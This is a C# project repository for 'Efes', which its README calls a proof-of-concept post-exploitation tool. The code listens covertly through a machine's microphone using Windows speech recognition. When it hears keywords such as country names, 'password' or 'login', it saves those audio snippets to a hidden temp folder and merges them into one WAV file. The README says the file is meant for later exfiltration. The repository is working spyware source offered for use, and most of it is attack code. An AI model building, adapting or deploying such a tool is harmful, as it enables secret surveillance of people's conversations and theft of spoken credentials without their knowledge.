├── .gitattributes
├── .gitignore
├── Efes.sln
├── Efes
├── App.config
├── Dropper.cs
├── Efes.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
└── keywords.dat
└── README.md
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | [Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | project.fragment.lock.json
46 | artifacts/
47 |
48 | *_i.c
49 | *_p.c
50 | *_i.h
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.tmp_proj
65 | *.log
66 | *.vspscc
67 | *.vssscc
68 | .builds
69 | *.pidb
70 | *.svclog
71 | *.scc
72 |
73 | # Chutzpah Test files
74 | _Chutzpah*
75 |
76 | # Visual C++ cache files
77 | ipch/
78 | *.aps
79 | *.ncb
80 | *.opendb
81 | *.opensdf
82 | *.sdf
83 | *.cachefile
84 | *.VC.db
85 | *.VC.VC.opendb
86 |
87 | # Visual Studio profiler
88 | *.psess
89 | *.vsp
90 | *.vspx
91 | *.sap
92 |
93 | # TFS 2012 Local Workspace
94 | $tf/
95 |
96 | # Guidance Automation Toolkit
97 | *.gpState
98 |
99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 |
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 |
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 |
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 |
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 |
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 |
122 | # Web workbench (sass)
123 | .sass-cache/
124 |
125 | # Installshield output folder
126 | [Ee]xpress/
127 |
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 |
138 | # Click-Once directory
139 | publish/
140 |
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 |
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produces more ignoreable files
163 | *.nuget.props
164 | *.nuget.targets
165 |
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 |
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 |
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 |
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 |
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 |
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 |
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 |
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 |
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 |
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 |
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 |
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 |
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 |
231 | # Visual Studio 6 build log
232 | *.plg
233 |
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 |
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 |
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 |
249 | # FAKE - F# Make
250 | .fake/
251 |
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 |
256 | # CodeRush
257 | .cr/
258 |
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc
--------------------------------------------------------------------------------
/Efes.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.26430.6
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Efes", "Efes\Efes.csproj", "{69199E2C-9637-40C1-985B-AF995EFB659D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {69199E2C-9637-40C1-985B-AF995EFB659D}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Efes/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Efes/Dropper.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Speech.Recognition;
6 | using System.Globalization;
7 | using System.Reflection;
8 |
9 | namespace Efes
10 | {
11 | class Dropper
12 | {
13 | public string StorageDirectory { get; set; }
14 |
15 | private SpeechRecognitionEngine recognizer;
16 |
17 | public Dropper(string fname, CultureInfo culture, string storageDirectory = null)
18 | {
19 | //read keywords from dat file
20 | var kw = ReadKeywords();
21 |
22 | //use a random temp directory if not specified
23 | if (storageDirectory == null || !Directory.Exists(storageDirectory))
24 | storageDirectory = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString());
25 | StorageDirectory = storageDirectory;
26 | Directory.CreateDirectory(StorageDirectory);
27 |
28 | #if DEBUG
29 | Console.WriteLine(StorageDirectory);
30 | #endif
31 |
32 | var choices = new Choices(kw.ToArray());
33 | var gb = new GrammarBuilder();
34 | gb.AppendWildcard();
35 | gb.Append(choices);
36 | gb.AppendWildcard();
37 | var g = new Grammar(gb);
38 |
39 | recognizer = new SpeechRecognitionEngine(culture);
40 | recognizer.LoadGrammar(g);
41 | recognizer.SpeechRecognized += Recognizer_SpeechRecognized;
42 | recognizer.SetInputToDefaultAudioDevice();
43 | }
44 |
45 | ///
46 | /// Enable speech recognition and logging
47 | ///
48 | public void StartListening()
49 | {
50 | recognizer.RecognizeAsync(RecognizeMode.Multiple);
51 | }
52 |
53 | ///
54 | /// Disable speech recognition and logging
55 | ///
56 | public void StopListening()
57 | {
58 | recognizer.RecognizeAsyncStop();
59 | }
60 |
61 | ///
62 | /// Collects files into one wav file
63 | ///
64 | /// The path to the single wav file
65 | public string Collectfiles()
66 | {
67 | var files = CollapseWaves(new DirectoryInfo(StorageDirectory));
68 | return files.Where(x => x.Extension.ToLower() == ".wav").First().FullName;
69 | }
70 |
71 | private void Recognizer_SpeechRecognized(object sender, SpeechRecognizedEventArgs e)
72 | {
73 | #if DEBUG
74 | Console.WriteLine(e.Result.Text);
75 | #endif
76 | using (Stream file = File.Create(Path.Combine(StorageDirectory, Path.GetRandomFileName()) + ".efd"))
77 | {
78 | e.Result.Audio.WriteToWaveStream(file);
79 | file.Close();
80 | }
81 | }
82 |
83 | ///
84 | /// Reads the keywords to listen for out of an embedded dat file
85 | ///
86 | ///
87 | private IEnumerable ReadKeywords()
88 | {
89 | var assembly = Assembly.GetExecutingAssembly();
90 | var resourceName = "Efes.keywords.dat";
91 | var keywords = new List();
92 | using (Stream stream = assembly.GetManifestResourceStream(resourceName))
93 | {
94 | using (StreamReader reader = new StreamReader(stream))
95 | {
96 | string line;
97 | while ((line = reader.ReadLine()) != null)
98 | {
99 | if (!line.StartsWith("#") && !String.IsNullOrWhiteSpace(line)) //ignore commented lines
100 | keywords.Add(line);
101 | }
102 | }
103 | }
104 | return keywords;
105 | }
106 |
107 | ///
108 | /// Recursively merge all files in a directory with a WAV header
109 | ///
110 | /// Merging directory
111 | ///
112 | private IEnumerable CollapseWaves(DirectoryInfo dir)
113 | {
114 | const short CHANNELS = 1;
115 | const int SAMPLE_RATE = 16000;
116 | const short BITS_PER_SAMPLE = 16;
117 | const int HEADER_SIZE = 44; //size of a wav header
118 | //these are all case-sensitive / length-sensitive
119 | const string RIFF = "RIFF";
120 | const string WAVEfmt = "WAVEfmt ";
121 | const string DATA = "data";
122 |
123 | var files = dir.GetFiles().Where(f => f.Extension.ToLower() == ".wav" || f.Extension.ToLower() == ".efd");
124 |
125 | if (files.Count() <= 1)
126 | return files;
127 | else
128 | {
129 | //get first file in the directory
130 | var first = new FileStream(files.ElementAt(0).FullName, FileMode.Open, FileAccess.Read);
131 | //get second file
132 | var second = new FileStream(files.ElementAt(1).FullName, FileMode.Open, FileAccess.Read);
133 | //each file has a header, so add the total bytes and then subtract the header size for each
134 | int length = (int)(first.Length + second.Length - (2 * HEADER_SIZE));
135 |
136 | var merged = new FileStream(Path.Combine(dir.FullName, Path.GetRandomFileName()) + ".wav", FileMode.Create, FileAccess.Write);
137 |
138 | var bw = new BinaryWriter(merged);
139 | bw.Write(RIFF.ToCharArray());
140 | bw.Write(length + HEADER_SIZE);
141 |
142 | bw.Write(WAVEfmt.ToCharArray());
143 | //chunk information and audio format info
144 | bw.Write((int)16);
145 | bw.Write((short)1);
146 | bw.Write(CHANNELS);
147 | bw.Write(SAMPLE_RATE);
148 | bw.Write((int)(SAMPLE_RATE * ((BITS_PER_SAMPLE * CHANNELS) / 8)));
149 | bw.Write((short)((BITS_PER_SAMPLE * CHANNELS) / 8));
150 | bw.Write(BITS_PER_SAMPLE);
151 | bw.Write(DATA.ToCharArray());
152 | bw.Write(length);
153 |
154 | //read the files with an offset of the headersize
155 | byte[] arrFirst = new byte[first.Length];
156 | first.Read(arrFirst, HEADER_SIZE, arrFirst.Length - HEADER_SIZE);
157 | byte[] arrSecond = new byte[second.Length];
158 | second.Read(arrSecond, HEADER_SIZE, arrSecond.Length - HEADER_SIZE);
159 |
160 | first.Close();
161 | second.Close();
162 |
163 | bw.Write(arrFirst);
164 | bw.Write(arrSecond);
165 |
166 | bw.Close();
167 | merged.Close();
168 | //delete merged files
169 | File.Delete(files.ElementAt(0).FullName);
170 | File.Delete(files.ElementAt(1).FullName);
171 | return CollapseWaves(dir);
172 | }
173 | }
174 | }
175 | }
176 |
--------------------------------------------------------------------------------
/Efes/Efes.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {69199E2C-9637-40C1-985B-AF995EFB659D}
8 | Exe
9 | Efes
10 | Efes
11 | v4.5.2
12 | 512
13 | true
14 |
15 |
16 | AnyCPU
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 |
25 |
26 | AnyCPU
27 | pdbonly
28 | true
29 | bin\Release\
30 | TRACE
31 | prompt
32 | 4
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
--------------------------------------------------------------------------------
/Efes/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace Efes
8 | {
9 | class Program
10 | {
11 | static void Main(string[] args)
12 | {
13 | var dropper = new Dropper("keywords.dat", new System.Globalization.CultureInfo("en-US"));
14 | dropper.StartListening();
15 | Console.ReadKey();
16 | Console.WriteLine(dropper.Collectfiles());
17 | Console.ReadKey();
18 | }
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/Efes/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Efes")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Efes")]
13 | [assembly: AssemblyCopyright("Copyright © 2017")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("69199e2c-9637-40c1-985b-af995efb659d")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Efes/keywords.dat:
--------------------------------------------------------------------------------
1 | #Countries
2 | Afghanistan
3 | Bahrain
4 | Czechia
5 | Djibouti
6 | Egypt
7 | France
8 | Gabon
9 | Hong Kong
10 | Jordan
11 | Kazakhstan
12 | Liberia
13 | Mozambique
14 | North Korea
15 | Pakistan
16 | Qatar
17 | Russia
18 | Syria
19 | Tajikistan
20 | United Arab Emirates
21 | Venezuela
22 | Zambia
23 | #random
24 | password
25 | login
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Efes
2 | A simple proof-of-concept tool that uses the built-in speech recognition to listen for certain keywords that are spoken, and then saves that audio to the file. This post-exploitation tool could be used to passively listen for high-value data, and save it off to a file to be exfiltrated at a later date. Since it only records small snippets, the file size should be small, and ideally, only the interesting snippets would be recorded.
3 |
--------------------------------------------------------------------------------